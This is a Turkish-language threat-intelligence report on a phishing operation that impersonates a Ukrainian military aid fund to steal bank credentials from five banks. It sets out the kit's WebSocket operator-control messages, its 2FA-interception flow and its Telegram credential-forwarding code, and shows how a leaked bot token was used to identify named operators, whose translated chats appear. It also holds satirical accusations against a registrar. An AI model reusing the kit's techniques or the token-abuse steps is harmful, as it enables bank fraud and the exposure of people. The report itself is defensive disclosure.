Haberlere Geri Dön
Aktif Tehdit — Soruşturma Raporu

Askeri Yardım Konulu Kimlik Avı Ağı Ortaya Çıktı: 5 Banka Hedef Alındı, Failler Tespit Edildi

PhishDestroy’un otomatik Pipeline iş akışı, Ukrayna’daki bir askeri yardım vakfının kimliğine bürünen bir kimlik avı operasyonunu — alan adı kaydından operatörün kimliğinin tespitine kadar — dakikalar içinde ayrıntılı bir şekilde inceledi.

25 Mart 2026 PhishDestroy Araştırması Okuma süresi: 12 dakika
Ekran görüntüsü 1 — Soruşturmaya genel bakış: Ukraynalı askeri gazileri hedef alan dopomogvoina[.]sbs kimlik avı ağı.
5
Hedef Alınan Bankalar
3
Operatörler Belirlendi
6
Unmask’a Yapılan API Çağrıları
2
Paralel Kimlik Avı Projeleri
<30
Tam Analize Kalan Süre (Dakika)
Sponsor Açıklaması( genişletmek için tıklayın )
Bu araştırmanın resmi sponsorunu tanıtıyoruz
🏆 NiceNIC International Group Co., Limited 🏆
En yetkili o kayıt memuru Netcraft ile işbirliği yapmaktadır (sistemlerini aldatarak) · Şunun resmi alan adı sağlayıcısı: Kraken uyuşturucu pazarı · Toplu alım indirimi sunan firma · Şunun sadık takipçisi: "Tipik Bir Dolandırıcı" VK topluluğu — ama hâlâ bir anonimlik kursu satın almamış
⭐ 1.8
Trustpilot
Değerlendirme
$200
.ru fiyatı
120₽ gerçek
0
İstismar bildirimleri
uygulanmış
15,000%
Etki Alanı
işaretleme
  • "Çinli" (Hong Kong) olduğunu iddia etmesine rağmen, içerik oluşturucu aslen Gorlovka, Donetsk Halk Cumhuriyeti. Çince marka logosu tamamen süs amaçlıdır — tıpkı Hizmet Şartları gibi
  • Korur Rusça dil desteği VKontakte ve Telegram üzerinden satış yapıyor .ru reg.ru’nun ücretlendirdiği 200 $ karşılığında 120₽ (~$1.30)
  • Trustpilot’ta bahsedilen olumsuz yorumlar uyuşturucu pazarı alan adları gizemli bir şekilde ortadan kaybolur. Tesadüf mü? Kesinlikle hayır
  • [...]'nin aktif bir abonesi "Tipik Bir Dolandırıcı" (Tipik Dolandırıcı) VK topluluğu — kayıt sağlayıcınız dolandırıcılık gruplarını takip ediyorsa, hedef kitlesinin kim olduğunu anlarsınız
  • İşbirliği yaptığı kurumlar Netcraft listeden çıkarılmayı önleyecek kadar, ancak aynı zamanda kimlik hırsızlığı, kumar ve uyuşturucu alan adları için altyapıyı sürdürerek

Bu arada, “Tipik Dolandırıcı” dizisinde:

Orijinal (Rusça)
Çeviri (İngilizce)
Sponsorumuzun verdiği söz: "Типичный Мошенник" adlı hesabın bu paylaşımı gerçeğe dönüştüğünde — ve elimizdeki bilgilere göre, bu sadece ne zaman, değil eğer — Tüm ekibimiz VKontakte’ye üye olacak ve bu topluluğa katılacak. Bunu bizim ayakta alkışımız olarak kabul edin. 👏

* Bu bir hicivdir. NiceNIC bu araştırmaya destek vermemiştir. Ancak, kötüye kullanım bildirimlerimize 5 günden fazla bir süre boyunca yanıt vermemek suretiyle bu araştırmayı zorunlu hale getirmişlerdir. Yukarıda belirtilen her şey, kamuya açık bilgilere ve operasyonel deneyimlerimize dayanmaktadır. NiceNIC hakkındaki ayrıntılı raporumuzu okuyun →

PhishDestroy’un Buldukları

20 Mart 2026 tarihinde, PhishDestroy’un otomatik tehdit algılama Pipeline şu durumu tespit etti: dopomogvoina[.]sbs — [ad]'yi taklit eden bir kimlik avı sitesini barındıran, yeni kayıt edilmiş bir alan adı "Koruyucunun Kalkanı" (Shield of the Defender), uydurma bir Ukrayna askeri yardım vakfı. Bu site, Ukrayna’daki askeri gazileri, savaşta yaralananları ve şehit askerlerin ailelerini hedef alıyor; hükümetten mali yardım vaadinde bulunurken, Ukrayna’nın en büyük beş bankasının banka hesap bilgilerini çalıyor.

Aşağıda, otomatik analizimizin ortaya çıkardığı her şeyin eksiksiz bir dökümü yer almaktadır: sosyal mühendislik, teknik altyapı, gerçek zamanlı operatör kontrol sistemi ve sistemi yöneten kişilerin kimlikleri.

Etki Değerlendirmesi
Bu site özellikle en savunmasız grupları hedef almaktadır: TSSB’si olan savaş gazileri, devlet yardımı arayan şehit askerlerin aileleri ve karmaşık bürokratik sistemlerle uğraşan yaralı askeri personel. Çalınan her bir kimlik bilgisi, dakikalar içinde hesabın tamamen ele geçirilmesine yol açabilir.

1. Bölüm: Yem — Sahte Askeri Yardım Vakfı

Alan adı dopomogvoina[.]sbs 20 Mart 2026 tarihinde şu yolla tescil edildi: NiceNIC Uluslararası Grup A.Ş., kötüye kullanım vakalarına yavaş ya da hiç yanıt vermediği konusunda pek çok kayıt bulunan bir kayıt kuruluşu. Bu .sbs TLD (Side-By-Side), tek kullanımlık kimlik avı altyapıları için sıklıkla istismar edilen, düşük maliyetli bir gTLD’dir.

Site, resmi kurumlarla bağlantılı profesyonel bir yardım portalı olarak kendini tanıtmaktadır. Başlık kısmında Ukrayna bayrağı yer almakta, askeri görseller siteye güvenilirlik katmakta ve sayfa, meşru devlet programlarını yansıtan bürokratik bir üslupla özenle Ukraynaca yazılmıştır.

Sahte bir askeri yardım vakfını gösteren dopomogvoina kimlik avı sitesinin ana sayfası
Ekran görüntüsü 5 — "Щит Захисника" (Savunucunun Kalkanı) adını taklit eden kimlik avı sitesinin ana sayfası.

Güvenilirlik yaratmak amacıyla, işletmeciler ana sayfada göze çarpan bir yerde görüntülenen bir istatistik sayacı uydurdular:

  • 2.847 başvuru — bu da binlerce kişinin halihazırda yardım aldığını ima ediyor
  • 47,2 milyon ₴ dağıtıldı — UAH’da iri yapılı ama inandırıcı bir karakter
  • 19 program — kapsamlı, çok programlı bir operasyonun gerçekleştirilmesini öneren

Bu rakamlar tamamen uydurma olup, arka uç bağlantısı olmaksızın sayfa kaynağına sabit olarak kodlanmıştır. Tek bir amaca hizmet ederler: kurbanın tereddütlerini ortadan kaldırmak için sosyal kanıt sağlamak.

2. Bölüm: Tuzak — 5 Banka, Tek Hedef

"Подати заявку" (Başvuruyu Gönder) düğmesine tıkladıktan sonra, mağdurun karşısına bir banka seçim ekranı çıkar. Ukrayna'nın en büyük beş perakende bankası, her biri kendi resmi markası ve logosu ile birlikte seçenekler arasında yer alır. İşte bu noktada sosyal mühendislik, duygusal manipülasyondan teknik hırsızlığa doğru yön değiştirir.

5 Ukrayna bankasını gösteren banka seçim ekranı
Ekran görüntüsü 6 — Banka seçim ekranı. Her seçenek, özel bir kimlik bilgisi hırsızlığı sürecine yol açar.

Sitenin JavaScript paketinin incelenmesi sonucunda, her bir bankanın bir benzersiz, çok aşamalı kimlik bilgisi toplama süreci, söz konusu bankanın gerçek kimlik doğrulama akışına uyacak şekilde uyarlanmış:

PrivatBank

GirişŞifrePINSMS

monobank

GirişPINSMSE-posta

Oschadbank

GirişDoğrulaSMS

PUMB

GirişSMS

Ukrsibbank

GirişPINSMS

Her bankaya yönelik saldırı süreci aynı şemayı izler:

Sahte Yardım Sayfası
Banka Seçimi
Giriş Klonu
2FA Engelleme
Hesap Ele Geçirilmesi
Sahte PrivatBank giriş sayfası
Ekran görüntüsü 7 — Taklit edilmiş PrivatBank giriş sayfası.
Sahte PUMB giriş sayfası
Ekran görüntüsü 9 — Kopyalanmış PUMB giriş sayfası.
Sahte yardım sayfasından hesap ele geçirilmesine kadar uzanan kimlik avı aşamalarını gösteren saldırı akış şeması
Ekran Görüntüsü 10 — Saldırı sürecinin tamamı: sahte askeri yardım sayfasından başlayıp, banka seçimi aşamasından geçerek kimlik bilgilerinin çalınmasına ve hesabın ele geçirilmesine kadar.

Teknoloji yığını: React SPA ön uç şu yolla sunulur: Cloudflare CDN, bir Express.js kimlik bilgilerinin sızdırılmasını sağlayan arka uç sistemi. React mimarisi, meşru bankacılık arayüzlerinden ayırt edilemeyen, kesintisiz çok adımlı formların oluşturulmasına olanak tanır.

Bölüm 3: Gerçek Zamanlı Operatör Kontrolü

Bu, statik bir veritabanına sahip basit bir kimlik bilgisi toplayıcı değildir. Bu kimlik avı kiti şunları içerir: canlı WebSocket kontrol paneli bu sayede bir operatörün her bir kurban oturumunu gerçek zamanlı olarak kontrol etmesine olanak tanır.

Şu adresteki WebSocket uç noktası: wss://dopomogvoina[.]sbs/ws aşağıdaki mesaj türlerini destekler:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Bu gerçek zamanlı kontrol sayesinde operatör şunları yapabilir:

  • Bekleme durumuna zorla — kurbanın gerçek banka hesabına giriş yaparken "Başvurunuz işleniyor..." mesajını görüntülemek
  • Belirli bir adıma yönlendirme — ilk SMS kodu geçerlilik süresi dolmuşsa, kodu yeniden isteyin
  • Sahte hata mesajlarını göster — "Geçersiz kod, lütfen tekrar girin" uyarısıyla birden fazla 2FA jetonu toplamak
  • Özel sorular sorun — oturum sırasında doğum tarihi, kart numarası veya başka herhangi bir bilgiyi istemek
Bunu Tehlikeli Kılan Nedir?
Gerçek zamanlı operatör kontrolü, zamana dayalı iki faktörlü kimlik doğrulama (2FA) korumalarını etkisiz hale getirir. Operatör, SMS kodunu ele geçirir ve kurban sahte bir “işleniyor” animasyonuna bakarken bu kodu geçerlilik süresi içinde — genellikle 30 ila 120 saniye — kullanır.
Sahte banka giriş sayfasında telefon numarası giriş formu
Ekran görüntüsü 8 — Kimlik bilgilerinin çalınmasını başlatmak için kullanılan telefon numarası giriş formu.
WebSocket tabanlı operatör kontrol paneli
Ekran görüntüsü 11 — Operatörün kurbanların oturumlarını kontrol etmek için kullandığı gerçek zamanlı bot paneli.

Her oturumda çalınan verilerin tam kapsamı: phone, password, PIN, SMS code, card number, date of birthve email.

4. Bölüm: Cloudflare’in Perde Arkası — İki Proje, Tek Sunucu

Cloudflare’ın proxy hizmeti kaynak sunucuyu gizler, ancak PhishDestroy’un altyapı analiz Pipeline süreci gerçek kaynak IP adresini tespit etti: 45.131.214[.]148, barındırıldığı yer: RapidSeedbox / LeaseWeb Hollanda'da.

Önemli bir ayrıntı: dopomogvoina[.]sbs şu yol üzerinden yönlendirilir: Cloudflare, kaynak IP adresini gizleyerek. Ancak sistemimiz ayrıca şunları da izler: hlpforvpeople[.]sbs — aynı NiceNIC kayıt kuruluşu aracılığıyla kaydedilmiş ve benzer desenlere sahip ilgili bir alan adı. Bu alan adı şudur: Cloudflare’in arkasında DEĞİL, kaynak IP adresini doğrudan ifşa ederek: 45.131.214[.]148.

Bu IP adresine doğrudan bağlanmak — bir Host başlık — beklenmedik bir şeyi ortaya çıkardı: bir tamamen farklı bir kimlik avı sitesi. Ukrayna’ya askeri yardım yerine, varsayılan vhost şu hizmeti sundu: "Sağlık Kimliği", Endonezya kaynaklı bir sağlık sigortası kimlik avı operasyonu. Aynı sunucu, tamamen farklı kurbanlar, tamamen farklı bir ülke.

Aynı Sunucu, Aynı Operatörler, Farklı Mağdurlar
  • Proje 1: Ukrayna’ya yapılan askeri yardım → gazilerin banka hesap bilgilerini çalıyor
  • Proje 2: Endonezya sağlık sigortası → vatandaşların sağlık bilgilerini çalıyor
  • Aynı Express.js yığını, aynı WebSocket gerçek zamanlı kontrol paneli
  • Aynı BT-Panel (宝塔) sunucu yönetim arayüzü
  • İkinci projenin C2 etki alanı: rezervtemka[.]cc — PhishDestroy’un tehdit veritabanında tespit edilen, bilinen bir kimlik avı paneli
  • Rusça yorumlar Endonezya projesinin kaynak kodunda yer alan bilgiler, aynı CIS kökenli geliştiricileri doğrulamaktadır
Aynı sunucuda çalışan iki kimlik avı projesi — Ukrayna’ya askeri yardım ve Endonezya sağlık sigortası
Ekran Görüntüsü 12 — Aynı kaynak sunucuyu paylaşan iki paralel kimlik avı operasyonu: Ukrayna askeri yardımı (dopomogvoina) ve Endonezya sağlık sigortası (HealthCare ID).

Endonezya dilinde hazırlanmış bu kimlik avı şablonu bir PhishDestroy’un tehdit istihbarat veritabanında izlenen bilinen kit. Bu şablonun tam olarak aynısının Güneydoğu Asya genelinde, Endonezya, Tayland ve Vietnam’daki finans kurumlarını hedef alarak kullanıldığını gördük. Operatörler, aynı arka uç altyapısını yeniden kullanırken sadece ülkeye özgü şablonları değiştiriyorlar.

Ayrım gözetmeyen suçlular
Modern kimlik avı saldırılarının gerçeği şudur: Operatörler kimin malını çaldıklarına aldırış etmiyorlar. Askeri yardım arayan Ukraynalı gaziler, sağlık sigortası satın alan Endonezyalı işçiler — hedef, en fazla gelir getiren şablona göre değişiyor. Aynı Rusça konuşan operatörler, her iki kampanyayı da aynı sunucudan eşzamanlı olarak yürütüyor ve farklı ülkelerdeki kurbanlar arasında, sanki televizyon kanallarını değiştirir gibi geçiş yapıyorlar. Bugün hedef Ukrayna bankaları. Yarın ise İsrailli bankalar olabilir — Bonya'nın Mart 2026'da zaten sorduğu gibi.

5. Bölüm: Her Şeyi Ortaya Çıkaran config.json Dosyası

İşte tek bir yanlış yapılandırılmış dosyanın tüm operasyonu nasıl altüst ettiği — adım adım.

Kaynak sunucunun ikinci projesini belirledikten sonra, PhishDestroy'un JS Analiz Aracı — otomatik JavaScript analiz aracımız — Endonezya’daki kimlik avı sitesinin paketine yönlendirildi: https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Analiz aracı, 335 KB boyutundaki JavaScript dosyasından tüm API uç noktalarını, harici URL’leri ve yapılandırma yollarını çıkardı. Bulgular arasında şunlar yer alıyor:

  • Beş API uç noktası şu adreste: rezervtemka[.]cc — kimlik bilgilerinin doğrulanması için C2 paneli
  • [adres] adresine bir WebSocket bağlantısı wss://rezervtemka[.]cc
  • Mağdurların takibi için Facebook Pixel entegrasyonu
  • Şuna atıfta bulunulmaktadır: /config.json — Telegram botunun yapılandırması için çalışma zamanında yüklenir

Bu ipucunu takip ederek şunu aldık: /config.json kaynak IP adresinden. Dosyaya herhangi bir kimlik doğrulama gerekmeden erişilebiliyordu — web kök dizininde bulunuyordu ve herkes tarafından okunabilirdi:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Şu /config.json dosyaya kaynak IP adresinden doğrudan erişilebiliyordu — kimlik doğrulama yok, erişim kontrolü yok, sadece web kök dizininde duran sıradan bir JSON dosyası:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Bir Telegram botu jetonu, hem kullanıcı adı hem de şifre işlevi görür. Jetonu elinde bulunduran kişi, o bot adına API çağrıları yapabilir. Operatörler, kendi jetonlarını herkese açık bir dosyada bırakmışlardı. Altı API çağrısından sonra, her şeye sahip olmuştuk:

getMe — Bot kimliği: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — Grup adı: "Idr card" (aktif davet bağlantısı olan)
getChatAdministrators — Grup kurucusu dahil 3 yönetici
getChat(creator_id) — Yaratıcı: @monettiescobar, Telegram Premium, işletme profili, saat dilimi UTC+3
getChat(admin2_id) — İkinci yönetici: profili boş, alternatif hesap olduğundan şüpheleniliyor
getChatMemberCount — Operatör grubunda toplam 5 üye
config.json dosyasından operatörün tam kimliğinin belirlenmesine kadar 6 adet Telegram API çağrısını gösteren OSINT zinciri
Ekran Görüntüsü 13 — Tam OSINT zinciri: Açığa çıkan config.json dosyasından, 6 API çağrısıyla operatörün tam kimliğinin tespitine kadar.

Tek bir yanlış yapılandırılmış dosyadan başlayarak, altı HTTP isteği ile operatörün tam kimliğinin tespit edilmesine kadar. Hiçbir güvenlik açığı, hiçbir yetkisiz erişim — sadece operatörlerin kendilerinin açıkta bıraktığı bir jeton kullanılarak yapılan standart Telegram Bot API çağrıları.

6. Bölüm: Operatörler

Suçlu Yaratıcılığı Üzerine Bir Not

Aşağıda, berbat takma ad seçimlerine dair bir ders yer alıyor. Elimizde şunlar var: MONETTI ESCOBAR — çünkü tarihin en ünlü uyuşturucu baronunun adını kendinize takmak kadar “gözden uzak” bir şey olamaz. Bir de şunu var: Bonya, aynı zamanda şu adla da bilinir: PapaZakonVor (kelime anlamıyla “Yasa Gereği Baba-Hırsız” — Rus suç hiyerarşisine bir gönderme yapma girişimi), Boave bubullikk. Ve son olarak Devoys, takma adı @devosus Şüphe uyandıracak şekilde “dev ops us” gibi okunuyor — kullanıcı adına mesleğini yazan bir yazılımcı. Bunlar, otomatik tehdit istihbaratını alt edebileceklerini sanan kişiler. Spoiler: başaramadılar.

Telegram operatör grubu ‘Idr card’, bot jetonu aracılığıyla ifşa edildi
Ekran Görüntüsü 14 — Sızan bot jetonu sayesinde ortaya çıkan “Idr card” Telegram operatör grubu.
MONETTI ESCOBAR Telegram profili resmi
Sahibi / Yaratıcısı
MONETTI ESCOBAR
@monettiescobar
Telegram Kimliği: 8135223234
Telegram Premium, İşletme profili
Zaman dilimi: UTC+3 (CIS bölgesi)
10 adet genel mesaj — sıkı OPSEC
TraFFeeQ SohbetiMedusa Google AdsDeepfakes kanalı
Bonya'nın Telegram profili resmi
Operatör / Trafik
Bonya
@BoaCC159
Telegram Kimliği: 6242202706
Diğer adları: PapaZakonVor, Boa, bubullikk
12 grupta toplam 261 mesaj
DC2 — Amsterdam, Hollanda
CryptoGrabSTYX PazarıRaven CCEMPIRE SOHBETİPhoenix Çözümü
Geliştirici / Kodlayıcı
Devoys
@devosus
Telegram Kimliği: 8213612730
Kimlik avı kiti geliştiricisi — operatörler ona “kodcu” diye hitap ediyor
İhlal tespit edildiğinde “savunmayı düşünmesi” istendi
Tasarım gereği kamusal alanda en az yer kaplama
Kulp @devosus ≈ "dev ops us" — kullanıcı adı olarak iş unvanı
Kit geliştiricisiAltyapıGüvenlik

MONETTI ESCOBAR — Patron

MONETTI, sıkı bir operasyonel güvenlik politikası uygulamaktadır — yalnızca 10 genel mesaj 2 gruba ayrılmış. Ancak gruplar durumu açıkça ortaya koyuyor: TraFFeeQ Sohbeti (dolandırıcılık amaçlı trafik arbitrajı), Medusa Google Ads (siyah şapkalı Google Ads) ve bir Deepfakes kanalı. Telegram’daki iş profilinde “Есть предложение” ("Bir teklifim var") — hizmetlerini açıkça tanıtıyor. UTC+3 saat dilimi (Moskova/Minsk/Kiev ile aynı) ve 7/24 hizmet saatleri, BDT merkezli ve kesintisiz çalışan bir işletme olduğunu doğruluyor.

Bonya — Dikkatsiz Olan

MONETTI’nin titiz OPSEC uygulamasının aksine, Bonya (eski takma adı: PapaZakonVor — kabaca "DaddyThiefByLaw" — geride devasa bir dijital iz bıraktı — 12 yeraltı grubunda toplam 261 mesaj. Sohbet geçmişi adeta bir suçlu özgeçmişi gibi:

Bonya'nın Kendi Sözleri (Rusçadan çevrilmiştir)
  • "2,0 akım için fişler""Sadece [banka güvenliği] 2.0 için kimlik avı" — yeni nesil banka güvenlik sistemleriyle kimlik avı kitlerinin uyumluluğunun ele alınması
  • "İyi drop'lar bulmak zor""İyi para taşıyıcıları bulmak zor" — para çekmek için suç ortakları bulmak
  • "Gel de benimle birlikte kültür merkezinde çalış""Gel, benim çağrı merkezimde çalış" — operatör alımı
  • "Peki, burada İsrail bankalarıyla çalışmış olanlar var mı?""Burada İsrail bankalarıyla çalışmış olan var mı?" — yeni hedeflere genişleme (Mart 2026)
  • "Finans konusunda pek bir logo göremiyorum""Pek fazla finans günlüğü görmüyorum" — çalınan kimlik bilgilerinin kalitesinin tartışılması
  • "Eğer 1 proxy 1-2 akım bankası ise""Sadece 1-2 banka için tek bir vekil" — banka dolandırıcılığına karşı operasyonel güvenlik konusunu ele almak
  • "ATM kartını yuttu""Kartı ATM tarafından yutuldu" — Bir para kuryesi, ATM’nin kartı yuttuğunu iddia ederek onlardan ₴60.000 çaldı. Suçlular bile kendi suç ortakları tarafından dolandırılabiliyor.

Üye olduğu gruplar, onun hakkında eksiksiz bir tablo çiziyor: CryptoGrab (kripto cüzdan soyguncuları), STYX Pazarı (çalıntı veriler için yeraltı pazarı), Raven CC denetleyicisi (kredi kartı doğrulama araçları), EMPIRE SOHBETİ ve Phoenix Çözümü (dolandırıcılık koordinasyonu). Bu, tek seferlik bir suçlu değil — siber suç ekosisteminin içine yerleşmiş biri.

Devoys — Geliştirici

Operasyonun teknik omurgası. Tasarım gereği kamuoyunda neredeyse hiç iz bırakmayan bu yapı — grubun güvenliği aşıldığında Bonya açıkça ona seslendi: "@devosus, kıçımızı parçalamadan önce savunma konusunu bir düşün""@devosus, fena halde dayak yemeden önce savunmayı bir düşünelim." Bu ihlale verdiği alaycı yanıt — "Interpol'e ne zaman" ("ne zaman enterpolasyon yapılmalı") — bu durumun onların ilk kez başlarına gelen tehlikeli bir durum olmadığını gösteriyor.

Davranış Analizi: 261 Mesajın Çözümlenmesi

PhishDestroy'un OSINT Pipeline tarafından toplanan ve çevrilen toplam 261 kamuya açık mesaj Bonya’dan alınan, 12 yeraltı Telegram grubuna ait mesajlar (Haziran 2024 — Mart 2026). DeepL API aracılığıyla yapılan makine çevirisi, bağlam açısından manuel olarak düzeltilmiştir. Mesajlar, aşağıda suç türü bazında sınıflandırılmış eksiksiz bir operasyonel profil ortaya koymaktadır.

Mesaj Dağılımı: 12 gruba yayılmış 261 mesaj
  • 💬ONE|Sohbet — 91 mesaj (dolandırıcılıkla mücadele koordinasyonu)
  • Güncel/Doğrulamalar — 37 mesaj (doğrulama dolandırıcılığı)
  • Rolex | genel sohbet — 28 mesaj (kartlama)
  • EMPIRE SOHBETİ — 24 mesaj (karaborsa)
  • Fbstore — 23 mesaj (trafik arbitrajı)
  • FB-DOC — 22 mesaj (reklam sahtekarlığı)
  • Phoenix Çözümü — 17 mesaj (bankacılık dolandırıcılığı)
  • CryptoGrab — 11 mesaj (kripto tüketimi)
  • STYX Pazarı — 2 mesaj (yeraltı pazarı)
  • Raven CC denetleyicisi — 2 mesaj (kart kontrolü)

Bankacılık Dolandırıcılığı ve Kimlik Avı

💬ONE|SohbetMart 2025
"Burada sadece 2.0 phish var"
Ve burada 2,0 akım değerine sahip dirençler var
Yeni banka güvenlik protokolleriyle kimlik avı kitlerinin uyumluluğunun ele alınması
💬ONE|SohbetMart 2025
"Dostum, burada Phish'te hiçbir şey satmıyorlar, sadece ödeme için Phish var."
Dostum, burada fişle hiçbir şey satmıyorlar; ödeme için fiş kullanılıyor.
"Satış amaçlı kimlik avı" ile "doğrudan hırsızlık amaçlı kimlik avı" arasında ayrım yapmak
Phoenix ÇözümüMart 2026
"Burada İsrail'deki bankalarla çalışmış olan var mı?"
Peki, burada İsrail bankalarıyla çalışmış olanlar var mı?
İsrail bankacılık sektörüne faaliyetlerin genişletilmesi — Soruşturmamızdan 5 gün önce
Rolex | genel sohbetEylül 2024
"1 vekil varsa, sadece 1-2 banka"
Eğer 1 proxy 1-2 akım bankası ise
Çoklu banka dolandırıcılığında operasyonel güvenlik: Tespit edilmeyi önlemek için her 1-2 banka başına bir vekil
Rolex | genel sohbetEylül 2024
"Mali kayıtlar konusunda pek bir şey göremiyorum"
Finans konusunda pek bir logo göremiyorum
Yeraltı piyasalarında çalınan banka kimlik bilgilerinin kalitesinden şikayet etmek

Para Taşıyıcıları ve Nakit Çekme

💬ONE|SohbetMart 2025
"İyi damlalar bulmak zor"
İyi drop'lar bulmak da zor
"Drops" = çalınan paraları nakde çeviren para aktarıcıları. İşe alım sürecinin zorluğundan şikayet ediyorlar.
💬ONE|SohbetMart 2025
"Gel de benim çağrı merkezimde çalış"
Kültür Merkezi’ne gelip benimle çalışmaya başladılar
Bir dolandırıcılık çağrı merkezi operasyonuna aktif olarak personel alımı yapılıyor
GüncelHaziran 2024
"60 bin çalındı"
Bize 60 bin çaldılar
Bir para kuryesi, dolandırıcıların kendilerinden ₴60.000 çaldı. İronik bir adalet.
GüncelHaziran 2024
"Bir ATM kartı nasıl yutabilir ki lan?"
Bir ATM nasıl olur da kartı yutabilir ki lan?
Aracı, ATM’nin çalınan parayı elinde tutmak için kartı “yuttuğunu” iddia etti. Dolandırıcılar, dolandırıcıları dolandırıyor.
GüncelHaziran 2024
"O parayı bize aktardı, ama sonra parayı transfer etmek için gerekli ana hesap elimizde değildi"
O parayı bize aktardı ama o sırada parayı transfer etmek için gerekli ana hesap bizde yoktu
Para aktarım zincirinin açıklaması: mağdur → aracı hesap → birincil para taşıyıcı

Trafik Sahtekarlığı ve Reklam Kötüye Kullanımı

EMPIRE SOHBETİMart 2026
"Google'ı kullanmıyorum, sadece Facebook'u kullanıyorum"
Şey, ben Google’ı kullanmıyorum, sadece Facebook’u kullanıyorum.
Facebook reklam dolandırıcılığı konusunda uzmanlaşmıştır — kimlik avı sayfalarına trafik yönlendirmektedir
FB-DOCŞubat 2026
"Ben de bir kefil olmadan reklam harcamalarının %'sini ayırmazdım"
Ben de teminat olmadan harcamaların belirli bir yüzdesi karşılığında para yatırmazdım
Sahte Facebook reklam kampanyalarının yürütülmesi için ödeme koşullarının müzakere edilmesi
CryptoGrabOcak 2025
"Amerika'yı hedeflemek için Facebook'ta AML'yi denedim — internette iyi bir ayar bulamadım"
Facebook’ta AML’yi denedim, Amerika’yı da araştırdım ama internette bu konuda bilgili, hatta eski bağlantılar bile bulamadım.
Facebook reklamlarını kullanarak ABD’li kurbanları hedef alan kara para aklama dolandırıcılıkları düzenlemeye çalışmak
Psikolojik Profil: Bonya

261 mesajdan oluşan bu veri kümesi, bir orta düzey siber suçlu çeşitli faaliyet alanları: bankacılık kimlik avı, para aktarım şebekeleri, Facebook reklam dolandırıcılığı, kripto varlık hırsızlığı ve kredi kartı dolandırıcılığı. Temel özellikler:

  • İşsel dikkatsizlik — Tek bir hesapla halka açık gruplarda toplam 261 mesaj gönderildi. Birden fazla takma adın kullanılması (PapaZakonVor → Boa → Bonya), OPSEC konusunda farkındalık olduğunu ancak bunu uygulamada başarısız olunduğunu gösteriyor
  • İşe alım yaklaşımı — insanları aktif olarak “benim çağrı merkezimde çalışmaya” davet ediyor ve operasyonel bilgilerini para karşılığında satıyor
  • Mağdurlara karşı kayıtsızlık — Ukrayna, Avrupa, İsrail ve Amerika’daki hedefleri aynı tarafsızlıkla ele alıyor. Coğrafya, bu dolandırıcılık denkleminde sadece bir değişkendir
  • Güven sorunları — kendi para aktarıcısı tarafından ₴60K karşılığında ihanete uğradı. Bu durum, kurbanlarında yarattığı güvensizliği ironik bir şekilde yansıtıyor
  • Genişlemeye dayalı — en son Mart 2026’da, yeni bankacılık pazarlarını (İsrail) aktif olarak araştırıyor olması, Ukrayna’daki kimlik avı operasyonunun eşzamanlı yürütülen birçok operasyondan sadece biri olduğunu gösteriyor
Bonya: Tam Mesaj Günlüğü (12 grupta toplam 253 mesaj)
Bonya (@BoaCC159) — Mesaj Geçmişinin Tam Çevirisi
-- Phoenix Solution (16 mesaj) --
B
Bonya2026-03-17 14:22
Burada İsrail’deki bankalarla çalışmış olan var mı?Peki, burada İsrail bankalarıyla çalışmış olanlar var mı?
B
Bonya2026-03-17 14:22
O da sessizce çalışıyordu.biz de sessizce çalışıyoruz
B
Bonya2026-03-17 14:17
Nasıl gidiyor?Nasılsın?
B
Bonya2026-03-17 14:17
Herkese merhabaHerkese merhaba
B
Bonya2026-03-15 19:02
Eh, artık hemen hemen her şey düzeldi.Eh, genel olarak her şey yoluna girdi
B
Bonya2026-03-15 19:02
Şey, bu biraz zahmetli bir işEh, biraz baş belası yarattık işte
B
Bonya2026-03-15 19:01
Evet, ben de arka planda epey iş yaptım, her şey altüst oldu.Evet, sessiz işlerden de artık bıktım artık
B
Bonya2026-03-15 19:00
İzin günün nasıl geçti?Hafta sonu nasıl geçti?
B
Bonya2026-03-15 19:00
Hepiniz.Herkese açık
B
Bonya2026-03-14 14:29
Artık herkes onun Marik olduğunu bildiğine göre, o kadar da isimsiz sayılmaz.Artık o kadar da anonim sayılmaz, ne de olsa herkes onun kim olduğunu biliyor
B
Bonya2026-03-14 14:24
Yeniden DoğuşYeniden doğdu
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
Sohbet odasının kaybolduğunu görünce üzüldüm.Sohbetin kaybolduğunu görünce gerçekten üzüldüm
B
Bonya2026-03-14 14:22
Seni asla bulamayacağımı sanmıştım.Sizi bulamayacağımı sanmıştım
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
SiktirSiktir
-- 👨‍⚕️ FB-DOC — Trafik Tahkimi Sohbeti (21 mesaj) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Penisinle alnına bir yumruk at.Alnıma penisimle spam yapıyorum
B
Bonya2026-03-06 15:18
2,5😂 ekranında beş gibi.Ekran görüntüsündeki gibi 2,5😂
B
Bonya2026-02-19 17:05
hepinize.Hepinize
B
Bonya2026-02-19 17:04
Eğer bir anlaşma yaparsan, güleceğim.Eğer bir işlem açarsan, kahkaha atacağım
B
Bonya2026-02-19 17:04
kıtasal mı?Kıta tipi mi?
B
Bonya2026-02-19 17:04
İşte o da burada.İşte, o da kabul etti
B
Bonya2026-02-19 17:01
Bu yüzden, kefil istediğinizde her zaman adayları dikkatlice değerlendirin.Garanti hakkında soru sorduğunuzda her zaman bu kutuyu işaretleyin
B
Bonya2026-02-19 17:00
Bir kefil olup olmadığını sordu ve hemen ortadan kayboldu.Garantör hakkında bir soru sordu ve hemen ortadan kayboldu
B
Bonya2026-02-19 17:00
ay carinaya da Karina
B
Bonya2026-02-19 16:59
Demek kefil mi arıyorsun?Peki, garantiye mi gidiyorsun?
B
Bonya2026-02-19 16:57
